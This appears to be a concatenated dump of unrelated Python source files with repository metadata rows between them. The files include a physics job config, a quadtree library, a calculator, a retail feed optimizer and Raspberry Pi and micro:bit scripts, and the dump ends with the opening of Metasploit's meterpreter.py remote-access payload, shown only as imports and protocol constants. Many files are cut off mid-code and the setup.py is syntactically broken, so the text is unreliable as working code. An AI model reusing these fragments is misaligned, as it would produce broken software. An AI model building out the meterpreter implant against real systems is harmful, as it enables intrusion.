#-- StepName : Reco14c for MC - 2012
#-- ApplicationName : Brunel
#-- ApplicationVersion : v43r2p11
#-- OptionFiles : $APPCONFIGOPTS/Brunel/DataType-2012.py;$APPCONFIGOPTS/Brunel/MC-WithTruth.py;$APPCONFIGOPTS/Persistency/DST-multipleTCK-2012.py;$APPCONFIGOPTS/Persistency/Compression-ZLIB-1.py
#-- DDDB : fromPreviousStep
#-- CONDDB : fromPreviousStep
#-- ExtraPackages : AppConfig.v3r218
#-- Visible : Y
from Gaudi.Configuration import *
from GaudiConf import IOHelper
IOHelper('ROOT').inputFiles(['LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000001_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000002_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000003_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000004_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000005_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000006_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000007_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000008_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000009_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000010_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000011_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000012_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000013_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000014_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000015_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000016_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000017_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000018_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000019_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000020_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000021_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000022_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000023_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000024_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000025_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000026_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000027_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000029_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000030_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000031_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000032_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000033_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000034_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000035_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000036_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000037_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000038_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000039_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000040_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000041_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000042_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000043_2.AllStreams.dst'
], clear=True)
| 62.088608 | 215 | 0.798777 |
b801fafbe89ab89d0893778ef60e2212843497d8 | 12,257 | py | Python | pyqtree.py | GuillemHerrera/Pyqtree | 4f8491ba543ec26b6bf9272ee3e2f0f455eff259 | [
"MIT"
] | null | null | null | pyqtree.py | GuillemHerrera/Pyqtree | 4f8491ba543ec26b6bf9272ee3e2f0f455eff259 | [
"MIT"
] | null | null | null | pyqtree.py | GuillemHerrera/Pyqtree | 4f8491ba543ec26b6bf9272ee3e2f0f455eff259 | [
"MIT"
] | null | null | null | """
# Pyqtree
Pyqtree is a pure Python spatial index for GIS or rendering usage.
It stores and quickly retrieves items from a 2x2 rectangular grid area,
and grows in depth and detail as more items are added.
The actual quad tree implementation is adapted from
[Matt Rasmussen's compbio library](https://github.com/mdrasmus/compbio/blob/master/rasmus/quadtree.py)
and extended for geospatial use.
## Platforms
Python 2 and 3.
## Dependencies
Pyqtree is written in pure Python and has no dependencies.
## Installing It
Installing Pyqtree can be done by opening your terminal or commandline and typing:
pip install pyqtree
Alternatively, you can simply download the "pyqtree.py" file and place
it anywhere Python can import it, such as the Python site-packages folder.
## Example Usage
Start your script by importing the quad tree.
from pyqtree import Index
Setup the spatial index, giving it a bounding box area to keep track of.
The bounding box being in a four-tuple: (xmin, ymin, xmax, ymax).
spindex = Index(bbox=(0, 0, 100, 100))
Populate the index with items that you want to be retrieved at a later point,
along with each item's geographic bbox.
# this example assumes you have a list of items with bbox attribute
for item in items:
spindex.insert(item, item.bbox)
Then when you have a region of interest and you wish to retrieve items from that region,
just use the index's intersect method. This quickly gives you a list of the stored items
whose bboxes intersects your region of interests.
overlapbbox = (51, 51, 86, 86)
matches = spindex.intersect(overlapbbox)
There are other things that can be done as well, but that's it for the main usage!
## More Information:
- [Home Page](http://github.com/karimbahgat/Pyqtree)
- [API Documentation](https://karimbahgat.github.io/Pyqtree/)
## License:
This code is free to share, use, reuse, and modify according to the MIT license, see LICENSE.txt.
## Credits:
- Karim Bahgat
- Joschua Gandert
"""
__version__ = "1.0.0"
#PYTHON VERSION CHECK
import sys
PYTHON3 = int(sys.version[0]) == 3
if PYTHON3:
xrange = range
MAX_ITEMS = 10
MAX_DEPTH = 20
| 34.821023 | 121 | 0.59566 |
b8028a1a0d82b7861ade532f7556efe716f52f14 | 1,136 | py | Python | Day10/calci.py | viditvarshney/100DaysOfCode | eec82c98087093f1aec1cb21acab82368ae785a3 | [
"MIT"
] | null | null | null | Day10/calci.py | viditvarshney/100DaysOfCode | eec82c98087093f1aec1cb21acab82368ae785a3 | [
"MIT"
] | null | null | null | Day10/calci.py | viditvarshney/100DaysOfCode | eec82c98087093f1aec1cb21acab82368ae785a3 | [
"MIT"
] | null | null | null | from logo import logo
symbols = ['+', '-', '/', '*']
operations = {'+': add, '-': subtract,
'*': multiply, '/': divide}
Calci()
| 21.037037 | 100 | 0.529049 |
b805c6c952721423e773c7922c3d8b331193cf4b | 6,089 | py | Python | shoptimizer_api/optimizers_builtin/condition_optimizer.py | leozz37/shoptimizer | a940306cba4040e9d69e1ae2ce077c2a6a108c1f | [
"Apache-2.0"
] | null | null | null | shoptimizer_api/optimizers_builtin/condition_optimizer.py | leozz37/shoptimizer | a940306cba4040e9d69e1ae2ce077c2a6a108c1f | [
"Apache-2.0"
] | null | null | null | shoptimizer_api/optimizers_builtin/condition_optimizer.py | leozz37/shoptimizer | a940306cba4040e9d69e1ae2ce077c2a6a108c1f | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# Copyright 2020 Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# python3
"""A module for Shoptimizer API that fixes invalid condition values.
Reference: https://support.google.com/merchants/answer/6324469
If the condition field is specified as "new", but other fields in the
product imply that the condition is otherwise, this optimizer will reset
the condition value to "used".
"""
import logging
from typing import Any, Dict, List, Set
from flask import current_app
from optimizers_abstract import base_optimizer
_NEW = 'new'
_USED = 'used'
| 40.059211 | 84 | 0.702414 |
b805e135095833b9aacb9e146ceaa3844c6781fb | 670 | py | Python | setup.py | comradepopo/p4rmyknife | e34a12a86cc090e3add25dc5baa7f6629586a4c6 | [
"Apache-2.0"
] | null | null | null | setup.py | comradepopo/p4rmyknife | e34a12a86cc090e3add25dc5baa7f6629586a4c6 | [
"Apache-2.0"
] | 1 | 2019-10-18T23:10:11.000Z | 2019-10-18T23:10:11.000Z | setup.py | comradepopo/p4rmyknife | e34a12a86cc090e3add25dc5baa7f6629586a4c6 | [
"Apache-2.0"
] | null | null | null | try:
from setuptools import setup
except ImportError:
from distutils.core import setup
'description': 'P4rmyKnife - The Swiss Army Knife for P4',
'author': 'Assembla, Inc.',
'url': 'https://assembla.com/'
'author_email': 'louis@assembla.com',
'version': '0.1',
'install_requires': [],
'packages': ['p4rmyknife'],
'scripts': [],
'name': 'p4rmyknife'
setup(name='p4rmyknife',
description='P4rmyKnife - The Swiss Army Knife for P4',
author='Assembla, Inc.',
url='https://assembla.com/'
author_email='louis@assembla.com',
version='0.1',
install_requires=[],
packages=['p4rmyknife'],
scripts=[]
)
| 25.769231 | 62 | 0.626866 |
b807feaa7b46fd15709c8ce5d95d9ec7f33de619 | 446 | py | Python | utilities/readProperties.py | harry-100/qa-automation-framework | 5fbe03e930820537e53f2d26b1c2b2bd2b222bf5 | [
"MIT"
] | null | null | null | utilities/readProperties.py | harry-100/qa-automation-framework | 5fbe03e930820537e53f2d26b1c2b2bd2b222bf5 | [
"MIT"
] | null | null | null | utilities/readProperties.py | harry-100/qa-automation-framework | 5fbe03e930820537e53f2d26b1c2b2bd2b222bf5 | [
"MIT"
] | null | null | null | from configparser import RawConfigParser
config = RawConfigParser()
config.read("configuration/config.ini")
| 20.272727 | 52 | 0.7287 |
b80bab1732354a9bf5c8b8066aa6d633362ec4a1 | 181 | py | Python | tinyq/__init__.py | mozillazg/tinyq | fd9ecc593931c9b315c4aeb9150389b3e4ae670e | [
"MIT"
] | 14 | 2017-08-02T23:30:16.000Z | 2021-05-31T19:58:29.000Z | tinyq/__init__.py | mozillazg/tinyq | fd9ecc593931c9b315c4aeb9150389b3e4ae670e | [
"MIT"
] | null | null | null | tinyq/__init__.py | mozillazg/tinyq | fd9ecc593931c9b315c4aeb9150389b3e4ae670e | [
"MIT"
] | 2 | 2017-03-13T09:36:05.000Z | 2017-10-27T14:33:48.000Z | # -*- coding: utf-8 -*-
from tinyq.app import Application # noqa
__version__ = '0.3.0'
__author__ = 'mozillazg'
__license__ = 'MIT'
__copyright__ = 'Copyright (c) 2017 mozillazg'
| 22.625 | 46 | 0.696133 |
b80bd1236784afca06c2fdaedb154f5764c38921 | 258 | py | Python | henrietta/tests/__init__.py | zkbt/henrietta | 653d798b241ad5591b704967a0413a2457a4e734 | [
"MIT"
] | null | null | null | henrietta/tests/__init__.py | zkbt/henrietta | 653d798b241ad5591b704967a0413a2457a4e734 | [
"MIT"
] | 12 | 2018-09-12T03:56:04.000Z | 2019-02-15T04:12:53.000Z | henrietta/tests/__init__.py | zkbt/henrietta | 653d798b241ad5591b704967a0413a2457a4e734 | [
"MIT"
] | null | null | null | from .test_lightcurves import *
from .test_statistics import *
from .test_models import *
from .test_fitting import *
from .test_tools import *
from .test_photometry import *
from .test_tpf import *
from .test_imaging import *
from .test_photometry import *
| 25.8 | 31 | 0.790698 |
b80c3a78699daca713934719586192ebb12c7028 | 340 | py | Python | personas.py | Ulzahk/Practica-Python-CRUD | 2657be639bce88e5774f3b16c11ecbb33c41bc83 | [
"MIT"
] | null | null | null | personas.py | Ulzahk/Practica-Python-CRUD | 2657be639bce88e5774f3b16c11ecbb33c41bc83 | [
"MIT"
] | null | null | null | personas.py | Ulzahk/Practica-Python-CRUD | 2657be639bce88e5774f3b16c11ecbb33c41bc83 | [
"MIT"
] | null | null | null |
if __name__ == '__main__':
person = Person('David', 34)
print('Age: {}'.format(person.age))
person.say_hello() | 18.888889 | 87 | 0.585294 |
b80d9fd4d22bb1d71b3dd29f2cdfd01260186b03 | 614 | py | Python | python/right_couch_move.py | ktmock13/PiCouch | 21992efca9fa382c7a02c10fb037a994143038c6 | [
"Apache-2.0"
] | null | null | null | python/right_couch_move.py | ktmock13/PiCouch | 21992efca9fa382c7a02c10fb037a994143038c6 | [
"Apache-2.0"
] | null | null | null | python/right_couch_move.py | ktmock13/PiCouch | 21992efca9fa382c7a02c10fb037a994143038c6 | [
"Apache-2.0"
] | null | null | null | import RPi.GPIO as GPIO
from time import sleep
import sys
#setup
GPIO.setmode(GPIO.BOARD)
openRelay=11
closeRelay=13
GPIO.setup(openRelay, GPIO.OUT)
GPIO.setup(closeRelay, GPIO.OUT)
#get cmd args
duration = float(sys.argv[1])
opening = sys.argv[2] in ['true', 'True', '1', 'TRUE']
relay = openRelay if opening else closeRelay
#start
GPIO.output(relay, GPIO.HIGH)
print 'starting ' + ('open' if opening else 'close') + ' signal..'
#wait
print ' ' + str(duration) + 'secs'
sleep(duration)
#stop
print ' ...ending signal'
GPIO.output(relay, GPIO.LOW)
| 20.466667 | 66 | 0.640065 |
b80eb5f1166695a86c73eccb3c18067bd324e51b | 3,725 | py | Python | lib/python3.7/site-packages/dash_bootstrap_components/_components/Popover.py | dukuaris/Django | d34f3e3f09028511e96b99cae7faa1b46458eed1 | [
"MIT"
] | null | null | null | lib/python3.7/site-packages/dash_bootstrap_components/_components/Popover.py | dukuaris/Django | d34f3e3f09028511e96b99cae7faa1b46458eed1 | [
"MIT"
] | 12 | 2020-06-06T01:22:26.000Z | 2022-03-12T00:13:42.000Z | lib/python3.7/site-packages/dash_bootstrap_components/_components/Popover.py | dukuaris/Django | d34f3e3f09028511e96b99cae7faa1b46458eed1 | [
"MIT"
] | null | null | null | # AUTO GENERATED FILE - DO NOT EDIT
from dash.development.base_component import Component, _explicitize_args
| 67.727273 | 432 | 0.720537 |
b81062d8563ac7d8651bf77dad80875a2f3da169 | 3,954 | py | Python | aries_cloudagent/wallet/tests/test_key_pair.py | kuraakhilesh8230/aries-cloudagent-python | ee384d1330f6a50ff45a507392ce54f92900f23a | [
"Apache-2.0"
] | 247 | 2019-07-02T21:10:21.000Z | 2022-03-30T13:55:33.000Z | aries_cloudagent/wallet/tests/test_key_pair.py | kuraakhilesh8230/aries-cloudagent-python | ee384d1330f6a50ff45a507392ce54f92900f23a | [
"Apache-2.0"
] | 1,462 | 2019-07-02T20:57:30.000Z | 2022-03-31T23:13:35.000Z | aries_cloudagent/wallet/tests/test_key_pair.py | kuraakhilesh8230/aries-cloudagent-python | ee384d1330f6a50ff45a507392ce54f92900f23a | [
"Apache-2.0"
] | 377 | 2019-06-20T21:01:31.000Z | 2022-03-30T08:27:53.000Z | from asynctest import TestCase as AsyncTestCase
import json
from ...storage.error import StorageNotFoundError
from ..util import bytes_to_b58
from ..key_type import KeyType
from ...core.in_memory import InMemoryProfile
from ...storage.in_memory import InMemoryStorage
from ..key_pair import KeyPairStorageManager, KEY_PAIR_STORAGE_TYPE
| 35.303571 | 88 | 0.687405 |
b8116854eec000b484014c431645628bfade8561 | 6,191 | py | Python | sonipy/scales/frequency.py | Sabrina-Knappe/sonipy | eaf89afaee0d9c2d5ba7a035d43e651b8919b84e | [
"MIT"
] | 22 | 2020-07-04T19:05:25.000Z | 2022-02-25T08:39:01.000Z | sonipy/scales/frequency.py | Sabrina-Knappe/sonipy | eaf89afaee0d9c2d5ba7a035d43e651b8919b84e | [
"MIT"
] | 6 | 2020-07-07T17:09:00.000Z | 2021-04-12T16:37:41.000Z | sonipy/scales/frequency.py | Sabrina-Knappe/sonipy | eaf89afaee0d9c2d5ba7a035d43e651b8919b84e | [
"MIT"
] | 6 | 2020-07-07T08:28:33.000Z | 2021-12-21T03:52:09.000Z | from __future__ import print_function
import warnings
import numpy as np
C4 = 261.6 # Hz
piano_max = 4186.01 # Hz
piano_min = 27.5000 # Hz - not audible
__all__ = ['cent_per_value','get_f_min','get_f_max','FrequencyScale']
def cent_per_value(f_min, f_max, v_min, v_max):
"""
This function takes in a frequency max and min, and y value max and min and returns a y scale parameter in units of cents/y value.
Cents are a logarithmic unit of tone intervals (https://en.wikipedia.org/wiki/Cent_(music)).
Parameters
----------
f_min : float
Minimum frequency.
f_max : float
Maximum frequency.
v_min : float
Minimum y value.
v_max : float
Maximum y value.
Returns
-------
float
A y-scale parameter in units of cents/y value.
"""
step = 1200 * np.log2(f_max / f_min) / (v_max - v_min)
return step
def get_f_min(f_max, cents_per_value, v_min, v_max):
"""
This function takes in a y value max and min, a maximum frequency and a y scale parameter in units of cents/y value, and returns the minimum frequency that fits to such a scale.
Cents are a logarithmic unit of tone intervals (https://en.wikipedia.org/wiki/Cent_(music)).
Parameters
----------
f_max : float
Maximum frequency.
cents_per_value : float
A y scale parameter in units of cents/y value.
v_min : float
Minimum y value.
v_max : float
Maximum y value.
Returns
-------
float
Minimum frequency.
"""
f_min = f_max / (2 ** ((v_max - v_min) * cents_per_value / 1200))
return f_min
def get_f_max(f_min, cents_per_value, v_min, v_max):
"""
This function takes in a y value max and min, a minimum frequency and a y scale parameter in units of cents/y value, and returns the maximum frequency that fits to such a scale.
Cents are a logarithmic unit of tone intervals (https://en.wikipedia.org/wiki/Cent_(music)).
Parameters
----------
f_min : float
Minimum frequency.
cents_per_value : float
A y scale parameter in units of cents/y value.
v_min : float
Minimum y value.
v_max : float
Maximum y value.
Returns
-------
float
Maximum frequency.
"""
f_max = f_min * (2 ** ((v_max - v_min) * cents_per_value / 1200))
return f_max
| 34.977401 | 181 | 0.63237 |
b8118840491eaf33f7fcef02b6ab1cab5378d698 | 338 | py | Python | core_admin/des/ccd/daemon.py | linea-it/tno | f973381280504ceb1b606b5b3ccc79b6b8c2aa4f | [
"MIT"
] | null | null | null | core_admin/des/ccd/daemon.py | linea-it/tno | f973381280504ceb1b606b5b3ccc79b6b8c2aa4f | [
"MIT"
] | 112 | 2018-04-24T19:10:55.000Z | 2022-02-26T16:55:02.000Z | core_admin/des/ccd/daemon.py | linea-it/tno | f973381280504ceb1b606b5b3ccc79b6b8c2aa4f | [
"MIT"
] | null | null | null | from apscheduler.schedulers.background import BackgroundScheduler
from des.ccd import start_pipeline
scheduler = BackgroundScheduler()
scheduler.add_job(
download_queue,
'interval',
# minutes=1
seconds=20,
max_instances=1,
id='des_download_ccd'
)
scheduler.start()
| 16.095238 | 65 | 0.739645 |
b811d6fa0121474e3b20b511fc6bfce131c9ffa7 | 440 | py | Python | calc-app/input_console.py | t4d-classes/python_10042021 | e2c28448ad66784c429655ab766f902b76d6ac79 | [
"MIT"
] | null | null | null | calc-app/input_console.py | t4d-classes/python_10042021 | e2c28448ad66784c429655ab766f902b76d6ac79 | [
"MIT"
] | null | null | null | calc-app/input_console.py | t4d-classes/python_10042021 | e2c28448ad66784c429655ab766f902b76d6ac79 | [
"MIT"
] | null | null | null | from common.input import input_int, input_float
| 20 | 57 | 0.725 |
b811e4d73c683e7404a77a68edf057c683bf41a7 | 1,872 | py | Python | tools/stimgen/gen_recall.py | herenvarno/gsbn | 47ed0932b605d8b3cf9661f9308908364ad5892e | [
"MIT"
] | 2 | 2016-08-12T15:06:02.000Z | 2021-10-05T08:12:17.000Z | tools/stimgen/gen_recall.py | herenvarno/gsbn | 47ed0932b605d8b3cf9661f9308908364ad5892e | [
"MIT"
] | 2 | 2017-04-23T17:22:23.000Z | 2017-05-25T14:22:51.000Z | tools/stimgen/gen_recall.py | herenvarno/gsbn | 47ed0932b605d8b3cf9661f9308908364ad5892e | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import os
import sys
import re
import math
import random
import matplotlib.pyplot as plt
import numpy as np
from google.protobuf import text_format
sys.path.append(os.path.dirname(os.path.realpath(__file__))+"/../../build")
import gsbn_pb2
if len(sys.argv) < 1:
print("Arguments wrong! Please retry with command :")
print("python "+os.path.realpath(__file__)+" <output file name>")
exit(-1)
filename = sys.argv[1]
patterns = []
masks = []
DIM_HCU = 10
DIM_MCU = 10
rd = gsbn_pb2.StimRawData()
p = [0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff]
patterns.append(p)
p = [0,1,2,3,4,5,6,7,8,9]
patterns.append(p)
p = [0,1,2,3,4,5,6,7,8,0xfffffff]
patterns.append(p)
p = [0,1,2,3,4,5,6,7,0x7fffffff,0x7fffffff]
patterns.append(p)
p = [0,1,2,3,4,5,6,0x7fffffff,0x7fffffff,0x7fffffff]
patterns.append(p)
p = [0,1,2,3,4,5,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff]
patterns.append(p)
p = [0,1,2,3,4,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff]
patterns.append(p)
p = [0,1,2,3,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff]
patterns.append(p)
p = [0,1,2,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff]
patterns.append(p)
p = [0,1,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff]
patterns.append(p)
p = [0,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff]
patterns.append(p)
m = [0,0,0,0,0,0,0,0,0,0]
masks.append(m)
m = [1,1,1,1,1,1,1,1,1,1]
masks.append(m)
for p in patterns:
for v in p:
rd.data.append(v)
for p in masks:
for v in p:
rd.mask.append(v)
rd.data_rows = len(patterns)
rd.data_cols = DIM_HCU
rd.mask_rows = len(masks)
rd.mask_cols = DIM_HCU
with open(filename, "wb+") as f:
f.write(rd.SerializeToString())
| 25.643836 | 115 | 0.744658 |
b81231fb69c94c906db0d3069a6a4df0633be007 | 174 | py | Python | python/find_country/city.py | lukasjoc/scritps | ebcffef0a3977ab8bb1bebf20383c350bd7baa37 | [
"0BSD"
] | 1 | 2020-11-09T19:32:43.000Z | 2020-11-09T19:32:43.000Z | python/find_country/city.py | lukasjoc/scritps | ebcffef0a3977ab8bb1bebf20383c350bd7baa37 | [
"0BSD"
] | null | null | null | python/find_country/city.py | lukasjoc/scritps | ebcffef0a3977ab8bb1bebf20383c350bd7baa37 | [
"0BSD"
] | null | null | null | #!/usr/bin/env python3
from geopy.geocoders import Nominatim
locator = Nominatim(user_agent="getcity")
loc = locator.geocode("Munich")
print(loc.latitude, loc.longitude)
| 17.4 | 41 | 0.764368 |
b8126bfcea007e0faa9e48fd38823790a37c5d11 | 6,448 | py | Python | bitio/src/microbit/repl/repl.py | hungjuchen/Atmosmakers | 4e8e64fba3d7a31840f69a5aa3823247aa5dca02 | [
"MIT"
] | 85 | 2017-06-09T20:53:46.000Z | 2022-03-09T21:35:05.000Z | bitio/src/microbit/repl/repl.py | hungjuchen/Atmosmakers | 4e8e64fba3d7a31840f69a5aa3823247aa5dca02 | [
"MIT"
] | 34 | 2017-06-09T20:52:05.000Z | 2021-02-19T19:49:45.000Z | bitio/src/microbit/repl/repl.py | hungjuchen/Atmosmakers | 4e8e64fba3d7a31840f69a5aa3823247aa5dca02 | [
"MIT"
] | 32 | 2017-06-09T10:15:19.000Z | 2021-11-20T09:08:08.000Z | # repl/repl.py
#
# A REPL interface to a micro:bit or similar device running MicroPython
# This is written on top of pyserial, however the dependency on pyserial
# is soft (as the serial instance is passed in as a constructor parameter
# and the detection of the need to bytes-encode strings is dynamic).
# Thus you can pass in any object that implements the following interface:
# write(str)
# read()-> str
# and/or this interface:
# write(bytes)
# read()->bytes
import time
import re
# END
| 35.234973 | 108 | 0.563896 |
b814083d787036eed69c0998c2575b86f722e9ca | 3,172 | py | Python | src/cocoannot/annotpreferred/models.py | coco-tasks/annotation-tool | ebd2e77ec8aeddedb9f87f457b6d5d8989b602db | [
"MIT"
] | 9 | 2019-04-18T15:35:38.000Z | 2021-06-07T08:01:27.000Z | src/cocoannot/annotpreferred/models.py | coco-tasks/annotation-tool | ebd2e77ec8aeddedb9f87f457b6d5d8989b602db | [
"MIT"
] | 1 | 2019-07-16T10:07:09.000Z | 2019-07-16T10:07:09.000Z | src/cocoannot/annotpreferred/models.py | coco-tasks/annotation-tool | ebd2e77ec8aeddedb9f87f457b6d5d8989b602db | [
"MIT"
] | 3 | 2020-05-20T12:06:59.000Z | 2020-12-12T06:45:26.000Z | from django.contrib.auth.models import User
from django.db import models
from markdownx.models import MarkdownxField
| 33.041667 | 108 | 0.698298 |
b81415a0a71fcac22aeb01aa39ba0c4dc0f68e8c | 13,866 | py | Python | data/meterpreter/meterpreter.py | codex8/metasploit-framework | eb745af12fe591e94f8d6ce9dac0396d834991ab | [
"Apache-2.0",
"BSD-3-Clause"
] | 1 | 2015-11-05T21:38:38.000Z | 2015-11-05T21:38:38.000Z | data/meterpreter/meterpreter.py | codex8/metasploit-framework | eb745af12fe591e94f8d6ce9dac0396d834991ab | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | data/meterpreter/meterpreter.py | codex8/metasploit-framework | eb745af12fe591e94f8d6ce9dac0396d834991ab | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/python
import code
import ctypes
import os
import random
import select
import socket
import struct
import subprocess
import sys
import threading
has_windll = hasattr(ctypes, 'windll')
#
# Constants
#
PACKET_TYPE_REQUEST = 0
PACKET_TYPE_RESPONSE = 1
PACKET_TYPE_PLAIN_REQUEST = 10
PACKET_TYPE_PLAIN_RESPONSE = 11
ERROR_SUCCESS = 0
# not defined in original C implementation
ERROR_FAILURE = 1
CHANNEL_CLASS_BUFFERED = 0
CHANNEL_CLASS_STREAM = 1
CHANNEL_CLASS_DATAGRAM = 2
CHANNEL_CLASS_POOL = 3
#
# TLV Meta Types
#
TLV_META_TYPE_NONE = ( 0 )
TLV_META_TYPE_STRING = (1 << 16)
TLV_META_TYPE_UINT = (1 << 17)
TLV_META_TYPE_RAW = (1 << 18)
TLV_META_TYPE_BOOL = (1 << 19)
TLV_META_TYPE_COMPRESSED = (1 << 29)
TLV_META_TYPE_GROUP = (1 << 30)
TLV_META_TYPE_COMPLEX = (1 << 31)
# not defined in original
TLV_META_TYPE_MASK = (1<<31)+(1<<30)+(1<<29)+(1<<19)+(1<<18)+(1<<17)+(1<<16)
#
# TLV base starting points
#
TLV_RESERVED = 0
TLV_EXTENSIONS = 20000
TLV_USER = 40000
TLV_TEMP = 60000
#
# TLV Specific Types
#
TLV_TYPE_ANY = TLV_META_TYPE_NONE | 0
TLV_TYPE_METHOD = TLV_META_TYPE_STRING | 1
TLV_TYPE_REQUEST_ID = TLV_META_TYPE_STRING | 2
TLV_TYPE_EXCEPTION = TLV_META_TYPE_GROUP | 3
TLV_TYPE_RESULT = TLV_META_TYPE_UINT | 4
TLV_TYPE_STRING = TLV_META_TYPE_STRING | 10
TLV_TYPE_UINT = TLV_META_TYPE_UINT | 11
TLV_TYPE_BOOL = TLV_META_TYPE_BOOL | 12
TLV_TYPE_LENGTH = TLV_META_TYPE_UINT | 25
TLV_TYPE_DATA = TLV_META_TYPE_RAW | 26
TLV_TYPE_FLAGS = TLV_META_TYPE_UINT | 27
TLV_TYPE_CHANNEL_ID = TLV_META_TYPE_UINT | 50
TLV_TYPE_CHANNEL_TYPE = TLV_META_TYPE_STRING | 51
TLV_TYPE_CHANNEL_DATA = TLV_META_TYPE_RAW | 52
TLV_TYPE_CHANNEL_DATA_GROUP = TLV_META_TYPE_GROUP | 53
TLV_TYPE_CHANNEL_CLASS = TLV_META_TYPE_UINT | 54
TLV_TYPE_SEEK_WHENCE = TLV_META_TYPE_UINT | 70
TLV_TYPE_SEEK_OFFSET = TLV_META_TYPE_UINT | 71
TLV_TYPE_SEEK_POS = TLV_META_TYPE_UINT | 72
TLV_TYPE_EXCEPTION_CODE = TLV_META_TYPE_UINT | 300
TLV_TYPE_EXCEPTION_STRING = TLV_META_TYPE_STRING | 301
TLV_TYPE_LIBRARY_PATH = TLV_META_TYPE_STRING | 400
